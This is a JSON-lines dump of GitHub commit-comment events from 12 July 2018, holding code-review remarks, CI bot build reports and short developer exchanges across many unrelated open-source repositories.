{"id":"7957257540","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29687482,"position":null,"line":null,"path":null,"commit_id":"ab9eb69263a6a7153348ae0ecb65cd1a6b7024aa","created_at":"2018-07-12T16:10:48Z","updated_at":"2018-07-12T16:10:48Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-354](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-354).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-354-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T16:10:48Z"}
{"id":"7957264483","type":"CommitCommentEvent","actor":{"login":"VanessaLong"},"repo":{"name":"philipmattocks/ProgrammingAssignment2"},"payload":{"comment":{"id":29687494,"position":null,"line":null,"path":null,"commit_id":"03d2a1f976a450801a043934c45ca2e9f04bc87a","created_at":"2018-07-12T16:12:01Z","updated_at":"2018-07-12T16:12:01Z","author_association":"NONE","body":"well done!"}},"created_at":"2018-07-12T16:12:01Z"}
{"id":"7957264844","type":"CommitCommentEvent","actor":{"login":"etiennellipse"},"repo":{"name":"aaronshaf/dynamodb-admin"},"payload":{"comment":{"id":29687496,"position":null,"line":null,"path":null,"commit_id":"db0b3e13461f28a3c6d7844d45cae5b950ee1640","created_at":"2018-07-12T16:12:05Z","updated_at":"2018-07-12T16:12:05Z","author_association":"NONE","body":"Great, works! 👍 Thanks @rchl "}},"created_at":"2018-07-12T16:12:05Z"}
{"id":"7957265608","type":"CommitCommentEvent","actor":{"login":"bato3"},"repo":{"name":"bato3/youtube-dl"},"payload":{"comment":{"id":29687499,"position":null,"line":null,"path":null,"commit_id":"99d88a0b5c9f6c1d3a2af3c9f8ad26d17071c9fc","created_at":"2018-07-12T16:12:13Z","updated_at":"2018-07-12T16:12:13Z","author_association":"OWNER","body":"flake8"}},"created_at":"2018-07-12T16:12:13Z"}
{"id":"7957267684","type":"CommitCommentEvent","actor":{"login":"manveru"},"repo":{"name":"ivanbrennan/fakeproject"},"payload":{"comment":{"id":29687502,"position":7,"line":7,"path":"nix/update-gemset","commit_id":"e8f525226303dc563610af3d7f5a258c636e4f2a","created_at":"2018-07-12T16:12:34Z","updated_at":"2018-07-12T16:12:34Z","author_association":"NONE","body":"You can make that one step, via `nix-shell --run 'bundix -l --gemset=nix/gemset.nix`, should be faster too :)"}},"created_at":"2018-07-12T16:12:34Z"}
{"id":"7957274517","type":"CommitCommentEvent","actor":{"login":"MantisLord"},"repo":{"name":"cmangos/tbc-db"},"payload":{"comment":{"id":29687516,"position":null,"line":null,"path":null,"commit_id":"0a3e5dd645bd5ce4b4674485479819391e5830d5","created_at":"2018-07-12T16:13:50Z","updated_at":"2018-07-12T16:13:50Z","author_association":"COLLABORATOR","body":"Thanks, should be handled now."}},"created_at":"2018-07-12T16:13:50Z"}
{"id":"7957274519","type":"CommitCommentEvent","actor":{"login":"ev1stensberg"},"repo":{"name":"DirtyBitz/volkano-frontend"},"payload":{"comment":{"id":29687517,"position":71,"line":114,"path":"components/Profile.tsx","commit_id":"8121e1da2c943f9591d32d90a1d185a21f26849d","created_at":"2018-07-12T16:13:50Z","updated_at":"2018-07-12T16:13:50Z","author_association":"NONE","body":"Bare et tips så du ikke trenger å skrive den samme koden hele tiden i `mapDispatchToProps` er å importere action filen og å bruke spread operator for å dekorere hver funksjon https://stackoverflow.com/a/46434218/5893008"}},"created_at":"2018-07-12T16:13:50Z"}
{"id":"7957276125","type":"CommitCommentEvent","actor":{"login":"brian-mann"},"repo":{"name":"cypress-io/commit-info"},"payload":{"comment":{"id":29687520,"position":null,"line":null,"path":null,"commit_id":"4f95da18b21ceeec846bd5f6444ec0eff0881993","created_at":"2018-07-12T16:14:08Z","updated_at":"2018-07-12T16:14:08Z","author_association":"MEMBER","body":"I am like... super not a fan of this utility parsing environment variables. This is incredibly surprising to me. I want it to only find `git` related things, and nothing more.\r\n\r\nWe already have our own (wayyyyy) more comprehensive fallbacks in the main repo regarding what environment variables to look for when `git` does not provide enough information.\r\n\r\nI feel like this is overstepping the boundaries of what this utility is supposed to provide. Either this utility needs to have all of the logic of the main repo in the fallbacks or it just needs to handle `git`.\r\n\r\nAs it stands, this utility can actually incorrectly report on env vars, which will actually prevent our own more comprehensive fallbacks in the main repo to then parse the environment variables."}},"created_at":"2018-07-12T16:14:08Z"}
{"id":"7957281361","type":"CommitCommentEvent","actor":{"login":"colo13verdadeo"},"repo":{"name":"Ludeon/RimWorld-Spanish"},"payload":{"comment":{"id":29687527,"position":null,"line":null,"path":null,"commit_id":"a81ef599dc5cac6a20e85fa8a4d0a4d0a449827c","created_at":"2018-07-12T16:15:04Z","updated_at":"2018-07-12T16:15:04Z","author_association":"CONTRIBUTOR","body":"Me lo puedes facilitar?"}},"created_at":"2018-07-12T16:15:04Z"}
{"id":"7957284080","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29687530,"position":null,"line":null,"path":null,"commit_id":"ab9eb69263a6a7153348ae0ecb65cd1a6b7024aa","created_at":"2018-07-12T16:15:33Z","updated_at":"2018-07-12T16:15:33Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-356](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-356).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-356-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T16:15:33Z"}
{"id":"7957285249","type":"CommitCommentEvent","actor":{"login":"Arnish"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29687532,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-12T16:15:46Z","updated_at":"2018-07-12T16:15:46Z","author_association":"NONE","body":"{\r\n\t\"PokecordPrefix\": \"p!\",\r\n\t\"Token\": \"____________\",\r\n\t\"OwnerID\": __________,\r\n\t\"EnableCatchResponse\": false,\r\n\t\"UserbotPrefix\": \"/\"\r\n}\r\n"}},"created_at":"2018-07-12T16:15:46Z"}
{"id":"7957289741","type":"CommitCommentEvent","actor":{"login":"VanessaLong"},"repo":{"name":"philipmattocks/ProgrammingAssignment2"},"payload":{"comment":{"id":29687543,"position":null,"line":null,"path":null,"commit_id":"03d2a1f976a450801a043934c45ca2e9f04bc87a","created_at":"2018-07-12T16:16:36Z","updated_at":"2018-07-12T16:16:36Z","author_association":"NONE","body":"well done!"}},"created_at":"2018-07-12T16:16:36Z"}
{"id":"7957295539","type":"CommitCommentEvent","actor":{"login":"TheSaltman"},"repo":{"name":"chibisov/drf-extensions"},"payload":{"comment":{"id":29687552,"position":null,"line":null,"path":null,"commit_id":"00712396be979aaa5a86246bee39284b5e5e8d71","created_at":"2018-07-12T16:17:39Z","updated_at":"2018-07-12T16:17:39Z","author_association":"NONE","body":"\r\nI think if you are going to have this as a package on pypy you should also update it there."}},"created_at":"2018-07-12T16:17:39Z"}
{"id":"7957296016","type":"CommitCommentEvent","actor":{"login":"brian-mann"},"repo":{"name":"cypress-io/commit-info"},"payload":{"comment":{"id":29687554,"position":null,"line":null,"path":null,"commit_id":"4f95da18b21ceeec846bd5f6444ec0eff0881993","created_at":"2018-07-12T16:17:44Z","updated_at":"2018-07-12T16:17:44Z","author_association":"MEMBER","body":"Thinking about this more... I would just prefer this repo be renamed to `git-info` and it stay strictly about parsing git."}},"created_at":"2018-07-12T16:17:44Z"}
{"id":"7957296600","type":"CommitCommentEvent","actor":{"login":"manveru"},"repo":{"name":"ivanbrennan/fakeproject"},"payload":{"comment":{"id":29687556,"position":28,"line":28,"path":"shell.nix","commit_id":"e8f525226303dc563610af3d7f5a258c636e4f2a","created_at":"2018-07-12T16:17:50Z","updated_at":"2018-07-12T16:17:50Z","author_association":"NONE","body":"This is not idea, better is to use `rubyenv.bundledRuby` instead to avoid issues of not being able to find gems in rake for example."}},"created_at":"2018-07-12T16:17:50Z"}
{"id":"7957297961","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29687560,"position":null,"line":null,"path":null,"commit_id":"47881ab5459b824f53f6a6f90cef7346591de7a8","created_at":"2018-07-12T16:18:06Z","updated_at":"2018-07-12T16:18:06Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - Win64-Windows-7-VisualStudio-14: OK (3309 of 3309 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T16:18:06Z"}
{"id":"7957298989","type":"CommitCommentEvent","actor":{"login":"SethTisue"},"repo":{"name":"scala/scala-lang"},"payload":{"comment":{"id":29687565,"position":null,"line":null,"path":null,"commit_id":"646cbb68846038ed69e66e74e056ba394a694ab9","created_at":"2018-07-12T16:18:17Z","updated_at":"2018-07-12T16:18:17Z","author_association":"MEMBER","body":"or \"in programs small and large\"?"}},"created_at":"2018-07-12T16:18:17Z"}
{"id":"7957306791","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29687583,"position":1,"line":1,"path":"python note","commit_id":"39fbb60af60e210373c6782cedcbdae730f105f0","created_at":"2018-07-12T16:19:42Z","updated_at":"2018-07-12T16:19:42Z","author_association":"OWNER","body":"string formatting output:\r\nname_='your name'\r\npassword_='your password'\r\n\r\ninfo='''\r\n_name={name}\r\n_password={password}\r\n'''.format(name=name_,password=password_\r\n\r\n"}},"created_at":"2018-07-12T16:19:42Z"}
{"id":"7957307528","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/python-louvain-feedstock"},"payload":{"comment":{"id":29687587,"position":null,"line":null,"path":null,"commit_id":"193a7a17ec0f86f16336292500e3eedce071b7e2","created_at":"2018-07-12T16:19:51Z","updated_at":"2018-07-12T16:19:51Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mriduls were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @mriduls were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-12T16:19:51Z"}
{"id":"7957310459","type":"CommitCommentEvent","actor":{"login":"crazyBoboKent"},"repo":{"name":"bambyee/studyyy"},"payload":{"comment":{"id":29687592,"position":15,"line":15,"path":"index_Q1Q2.html","commit_id":"8606f8bb6241484fb48dcef00f100b47f8d576ea","created_at":"2018-07-12T16:20:23Z","updated_at":"2018-07-12T16:20:23Z","author_association":"NONE","body":"parseIntされてるけど、そのあと、numberのチェックを行うの？"}},"created_at":"2018-07-12T16:20:23Z"}
{"id":"7957314134","type":"CommitCommentEvent","actor":{"login":"crazyBoboKent"},"repo":{"name":"bambyee/studyyy"},"payload":{"comment":{"id":29687600,"position":18,"line":18,"path":"index_Q1Q2.html","commit_id":"8606f8bb6241484fb48dcef00f100b47f8d576ea","created_at":"2018-07-12T16:21:01Z","updated_at":"2018-07-12T16:21:01Z","author_association":"NONE","body":"2回目以降に正しく数字を入力しても消さないの？"}},"created_at":"2018-07-12T16:21:01Z"}
{"id":"7957316003","type":"CommitCommentEvent","actor":{"login":"jsolson"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29687605,"position":null,"line":null,"path":null,"commit_id":"3b6950b65afa65d2b4d20590ac51fff24d1605a8","created_at":"2018-07-12T16:21:21Z","updated_at":"2018-07-12T16:21:21Z","author_association":"COLLABORATOR","body":">I realized near the end of last night the model wasn't centered on the vertical axis\r\n\r\nI'm not sure what part you're referring to, but the AJ-60 models are fine. The pins could be longer. On the stock small decoupler they don't reach, you have to use the BDB mini's.\r\n\r\nCan the RCS be built in to the engine mount? I'm looking at a few pics and I can't even pick out RCS nozzles on the real one. They might be covered though."}},"created_at":"2018-07-12T16:21:21Z"}
{"id":"7957316245","type":"CommitCommentEvent","actor":{"login":"OndrejM"},"repo":{"name":"MattGill98/Payara-Examples"},"payload":{"comment":{"id":29687606,"position":1,"line":1,"path":"ecosystem/gradle-example/.classpath","commit_id":"a1b488bce6f30f6e04d34207ec3e8d67695c5c5c","created_at":"2018-07-12T16:21:23Z","updated_at":"2018-07-12T16:21:23Z","author_association":"NONE","body":"This file is irelevant, should be removed from the repo. Only generated by Netbeans."}},"created_at":"2018-07-12T16:21:23Z"}
{"id":"7957318129","type":"CommitCommentEvent","actor":{"login":"OndrejM"},"repo":{"name":"MattGill98/Payara-Examples"},"payload":{"comment":{"id":29687610,"position":1,"line":1,"path":"ecosystem/gradle-example/.project","commit_id":"a1b488bce6f30f6e04d34207ec3e8d67695c5c5c","created_at":"2018-07-12T16:21:44Z","updated_at":"2018-07-12T16:21:44Z","author_association":"NONE","body":"Again irelevant, only generated by Netbeans."}},"created_at":"2018-07-12T16:21:44Z"}
{"id":"7957319396","type":"CommitCommentEvent","actor":{"login":"zah0"},"repo":{"name":"lrinQVQ/Xiaomi_Kernel_OpenSource"},"payload":{"comment":{"id":29687613,"position":null,"line":null,"path":null,"commit_id":"43bf70b25c789e2f35c4c40fc626856138c02f56","created_at":"2018-07-12T16:21:58Z","updated_at":"2018-07-12T16:21:58Z","author_association":"NONE","body":"为什么这里使用\"\"而不是<>"}},"created_at":"2018-07-12T16:21:58Z"}
{"id":"7957321428","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29687617,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-12T16:22:19Z","updated_at":"2018-07-12T16:22:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T16:22:19Z"}
{"id":"7957322974","type":"CommitCommentEvent","actor":{"login":"OndrejM"},"repo":{"name":"MattGill98/Payara-Examples"},"payload":{"comment":{"id":29687620,"position":1,"line":1,"path":"ecosystem/gradle-example/build.xml","commit_id":"a1b488bce6f30f6e04d34207ec3e8d67695c5c5c","created_at":"2018-07-12T16:22:36Z","updated_at":"2018-07-12T16:22:36Z","author_association":"NONE","body":"What is this file used for? For running the gradle build from Netbeans? It's not relevant for gradle at all, is it?"}},"created_at":"2018-07-12T16:22:36Z"}
{"id":"7957326170","type":"CommitCommentEvent","actor":{"login":"OndrejM"},"repo":{"name":"MattGill98/Payara-Examples"},"payload":{"comment":{"id":29687631,"position":1,"line":1,"path":"ecosystem/gradle-example/pom.xml","commit_id":"a1b488bce6f30f6e04d34207ec3e8d67695c5c5c","created_at":"2018-07-12T16:23:13Z","updated_at":"2018-07-12T16:23:13Z","author_association":"NONE","body":"Irelevant, gradle is enough to build the project. Maven files should be removed."}},"created_at":"2018-07-12T16:23:13Z"}
{"id":"7957326382","type":"CommitCommentEvent","actor":{"login":"SanjitKal"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29687632,"position":3,"line":499,"path":"src/Disco/Typecheck.hs","commit_id":"3899a5214a3409166a75a0456cf43ab8740c5706","created_at":"2018-07-12T16:23:15Z","updated_at":"2018-07-12T16:23:15Z","author_association":"COLLABORATOR","body":"Ah, I see. I didn't realize that was the behavior of sequence. I should\nhave written better tests. Also, why should Disco throw a type error for:\n\n:type (\\x (y:Nat). x - y)\n\nI've fixed this issue on my local branch, and Disco currently infers\nthe type of this function to be:\n\nλ x (y : ℕ). x - y : ℤ → ℕ → ℤ\n\n\nIsn't this the correct type?\n\n\n\n\nOn Wed, Jul 11, 2018 at 6:06 PM, Brent Yorgey <notifications@github.com>\nwrote:\n\n> This is not quite correct. Note that in the line of code above, sequence\n> :: [Maybe Type] -> Maybe [Type]; it returns Just if *all* the types were\n> Just, and Nothing otherwise. In other words, the Nothing case means that *at\n> least one* of the types was Nothing, for example, as in \\x (y:N) (z:Z).\n> ... . Since the x has no type annotation sequence (map unembed mtys)\n> would result in Nothing.\n>\n> In the code below you generate fresh type variables for *all* the\n> arguments; this works great if none of them had types to begin with, but if\n> some of them did have types then those types are simply ignored. For\n> example:\n>\n> Disco> :type (\\x (y:Nat). x - y)\n> λ x (y : ℕ). x - y : ℤ → ℤ → ℤ\n>\n> As you can see, it infers the type ℤ → ℤ → ℤ, which would be correct for λ\n> x y. x - y, but because of the type annotation on y it should be a type\n> error instead.\n>\n> I think what we should actually do is get rid of the case on sequence\n> (map unembed mtys); we only needed it before to distinguish the cases we\n> could handle from the cases we couldn't. But now we don't need it since we\n> can handle all the cases. Just take mtys and turn each Nothing into a\n> fresh type variable, and then proceed from there.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/disco-lang/disco/commit/3899a5214a3409166a75a0456cf43ab8740c5706#commitcomment-29678134>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AXOsJqfFulF1kTmzgT10O3myqUQVwjCXks5uFoTggaJpZM4VL-bI>\n> .\n>\n"}},"created_at":"2018-07-12T16:23:15Z"}
{"id":"7957329264","type":"CommitCommentEvent","actor":{"login":"owilss"},"repo":{"name":"owilss/exampleone"},"payload":{"comment":{"id":29687638,"position":null,"line":null,"path":null,"commit_id":"b6c68da77a302192a37ee0d2216e080c7fe6a691","created_at":"2018-07-12T16:23:48Z","updated_at":"2018-07-12T16:23:48Z","author_association":"OWNER","body":"Revisar los métodos usados"}},"created_at":"2018-07-12T16:23:48Z"}
{"id":"7957329373","type":"CommitCommentEvent","actor":{"login":"mchoma"},"repo":{"name":"fjuma/wildfly-core"},"payload":{"comment":{"id":29687639,"position":null,"line":null,"path":null,"commit_id":"b0c8a0f4619adc06927d95837132653e3880788a","created_at":"2018-07-12T16:23:49Z","updated_at":"2018-07-12T16:23:49Z","author_association":"NONE","body":"Will it be possible to add tests also for two operations? :\r\n- should-renew-certificate\r\n- revoke-certificate "}},"created_at":"2018-07-12T16:23:49Z"}
{"id":"7957331264","type":"CommitCommentEvent","actor":{"login":"owilss"},"repo":{"name":"owilss/exampleone"},"payload":{"comment":{"id":29687643,"position":null,"line":null,"path":null,"commit_id":"b6c68da77a302192a37ee0d2216e080c7fe6a691","created_at":"2018-07-12T16:24:11Z","updated_at":"2018-07-12T16:24:11Z","author_association":"OWNER","body":"Algunos métodos pueden estar obsoletos"}},"created_at":"2018-07-12T16:24:11Z"}
{"id":"7957331500","type":"CommitCommentEvent","actor":{"login":"bahmutov"},"repo":{"name":"cypress-io/commit-info"},"payload":{"comment":{"id":29687645,"position":null,"line":null,"path":null,"commit_id":"4f95da18b21ceeec846bd5f6444ec0eff0881993","created_at":"2018-07-12T16:24:13Z","updated_at":"2018-07-12T16:24:13Z","author_association":"COLLABORATOR","body":"Maybe separating this and not having fallbacks on env cars is good. Or maybe the fallbacks from the test runner should be moved here so they can be reused and strengthened separately from the test runner. \n\nSent from my iPhone\n\n> On Jul 12, 2018, at 18:17, Brian Mann <notifications@github.com> wrote:\n> \n> Thinking about this more... I would just prefer this repo be renamed to git-info and it stay strictly about parsing git.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-12T16:24:13Z"}
{"id":"7957332350","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":29687649,"position":null,"line":null,"path":null,"commit_id":"170a434f06f8bfe8aa9c718c67128e4204648abc","created_at":"2018-07-12T16:24:22Z","updated_at":"2018-07-12T16:24:22Z","author_association":"COLLABORATOR","body":"Was able to embed the Spider basic gbXML viewer into OS App https://github.com/ladybug-tools/spider/tree/master/gbxml-viewer-basic\r\n\r\n![image](https://user-images.githubusercontent.com/1327850/42646155-454acc08-85bd-11e8-9ff0-3d6acf6929be.png)\r\n\r\n![image](https://user-images.githubusercontent.com/1327850/42646163-4bde68b8-85bd-11e8-8ea5-8d05db249546.png)\r\n\r\nHad to run [Babel](https://babeljs.io/repl) to get backwards compatible version of ES6 code. Embedded ThreeJS code directly so can work offline.  Also added setGbXml function to use in app.  See [raw file](https://github.com/NREL/OpenStudio/blob/170a434f06f8bfe8aa9c718c67128e4204648abc/openstudiocore/src/openstudio_lib/library/embeddable_gbxml_editor.html) for complete diff.\r\n"}},"created_at":"2018-07-12T16:24:22Z"}
{"id":"7957334462","type":"CommitCommentEvent","actor":{"login":"MattGill98"},"repo":{"name":"MattGill98/Payara-Examples"},"payload":{"comment":{"id":29687653,"position":1,"line":1,"path":"ecosystem/gradle-example/.classpath","commit_id":"a1b488bce6f30f6e04d34207ec3e8d67695c5c5c","created_at":"2018-07-12T16:24:45Z","updated_at":"2018-07-12T16:24:45Z","author_association":"OWNER","body":"Can you request these changes on the PR please?"}},"created_at":"2018-07-12T16:24:45Z"}
{"id":"7957335176","type":"CommitCommentEvent","actor":{"login":"barancev"},"repo":{"name":"grigaman/selenium"},"payload":{"comment":{"id":29687656,"position":null,"line":null,"path":null,"commit_id":"759fa37aabb37072af59b075d48e6728eae8b5f8","created_at":"2018-07-12T16:24:53Z","updated_at":"2018-07-12T16:24:53Z","author_association":"NONE","body":"1) The mentioned issue (with \"EOFException: \\n not found: limit=0 content=…\" exception message) caused by a server (Selenium Server or an executable driver like geckodriver) dropping a persistent connection. As soon as you've a long enough pause between requests this exception occurs. It's not a flacky network, it's 100% reproducible behavior. And we've fixed this issue.\r\n\r\n2) OkHttp devs are aware of possible POST duplication, and OkHttp don't retry without good reason, see https://github.com/square/okhttp/issues/2394"}},"created_at":"2018-07-12T16:24:53Z"}
{"id":"7957336069","type":"CommitCommentEvent","actor":{"login":"piotrdrag"},"repo":{"name":"hughsie/fwupd"},"payload":{"comment":{"id":29687658,"position":null,"line":null,"path":null,"commit_id":"9cc84a1b35839ceccaa41c0b5ef156d68bb55be4","created_at":"2018-07-12T16:25:03Z","updated_at":"2018-07-12T16:25:03Z","author_association":"CONTRIBUTOR","body":"This is weird — any idea why only ca and pt_BR translations got updated?"}},"created_at":"2018-07-12T16:25:03Z"}
{"id":"7957336351","type":"CommitCommentEvent","actor":{"login":"Bertolius"},"repo":{"name":"ControlEverythingCommunity/SI7021"},"payload":{"comment":{"id":29687659,"position":null,"line":null,"path":null,"commit_id":"988884ac1e5c4bf05874dfd3ec2b29c98df3d8bb","created_at":"2018-07-12T16:25:07Z","updated_at":"2018-07-12T16:25:07Z","author_association":"NONE","body":"Yadwinder, I know this is a couple years old, but I put a scope on this code.  It appears the bus.ready_byte issues a stop command at the end of the read therefore executing the statement twice in a row.... it's simply reading the same byte twice...instead of getting the whole word.  Any thoughts?"}},"created_at":"2018-07-12T16:25:07Z"}
{"id":"7957336422","type":"CommitCommentEvent","actor":{"login":"OndrejM"},"repo":{"name":"MattGill98/Payara-Examples"},"payload":{"comment":{"id":29687660,"position":21,"line":21,"path":"ecosystem/pom.xml","commit_id":"a1b488bce6f30f6e04d34207ec3e8d67695c5c5c","created_at":"2018-07-12T16:25:08Z","updated_at":"2018-07-12T16:25:08Z","author_association":"NONE","body":"gradle-app isn't built by maven, should be removed from modules. It won't be built together with this maven parent project but it doesn't matter, it's just an example. Examples shouldn't depend on each other and can be built separately."}},"created_at":"2018-07-12T16:25:08Z"}
{"id":"7957357491","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29687701,"position":null,"line":null,"path":null,"commit_id":"c420eb1bb06e3fe01526496bcaf2fecc702f2fa4","created_at":"2018-07-12T16:29:06Z","updated_at":"2018-07-12T16:29:06Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c420eb1bb06e3fe01526496bcaf2fecc702f2fa4-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T16:29:06Z"}
{"id":"7957360357","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29687707,"position":null,"line":null,"path":null,"commit_id":"e8e334beab4a7cff4bc9bb5c52825ec1944654ae","created_at":"2018-07-12T16:29:39Z","updated_at":"2018-07-12T16:29:39Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-162937 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-162937\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T16:29:39Z"}
{"id":"7957360601","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29687708,"position":null,"line":null,"path":null,"commit_id":"96148a63415517c9edfaeea14e62e1be7dd0f20c","created_at":"2018-07-12T16:29:41Z","updated_at":"2018-07-12T16:29:41Z","author_association":"CONTRIBUTOR","body":"@adegroote: The API for bullet 3 (OpenCL etc) is different of the one for bullet 2.8 even if this one is updated in the current version of bullet and optimized with parallelism."}},"created_at":"2018-07-12T16:29:41Z"}
{"id":"7957367288","type":"CommitCommentEvent","actor":{"login":"genshinarita"},"repo":{"name":"cd-adapco/i18n"},"payload":{"comment":{"id":29687719,"position":null,"line":null,"path":null,"commit_id":"3cda562cc32832559df93dabe0a60cbfab2dd8c3","created_at":"2018-07-12T16:30:56Z","updated_at":"2018-07-12T16:30:56Z","author_association":"CONTRIBUTOR","body":"Automatically uploaded by WorldServer on behalf of Joern Elligsen on Jul 12, 2018 at 12:30:52 EDT."}},"created_at":"2018-07-12T16:30:56Z"}
{"id":"7957367597","type":"CommitCommentEvent","actor":{"login":"bahmutov"},"repo":{"name":"cypress-io/commit-info"},"payload":{"comment":{"id":29687721,"position":null,"line":null,"path":null,"commit_id":"4f95da18b21ceeec846bd5f6444ec0eff0881993","created_at":"2018-07-12T16:30:59Z","updated_at":"2018-07-12T16:30:59Z","author_association":"COLLABORATOR","body":"And yet having separate module that abstracts all CI variables could be used from many many projects and made robust. Also it’s testing on various CIs could be fast and simple. The point of cypress is to be a test runner. Adding code for CI environment variables parsing seems like a very different feature. But I would not spend any time on this at all - the pr to test runner is there and 3.1 is what we can really look forward to\n\nSent from my iPhone\n\n> On Jul 12, 2018, at 18:27, Brian Mann <notifications@github.com> wrote:\n> \n> Agree. Yank that out of here and cut a new breaking version. Just keep git specific functions in here and I will be happy. It'll tighten up the scope quite a bit.\n> \n> Having a different module is an interesting idea - but my first instinct is \"no\" because we're pulling off the environment variables in a highly controlled, specific structure where only some things are pulled off as opposed to everything.\n> \n> The problem is that there are oh so many different CI providers and different reasons to use those properties- then the NPM module would still be arbitrary regarding what it pulls off vs not.\n> \n> Instead, I really think it's okay that's in the primary repo since it makes it really clear what we're looking at and what we're doing with it.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-12T16:30:59Z"}
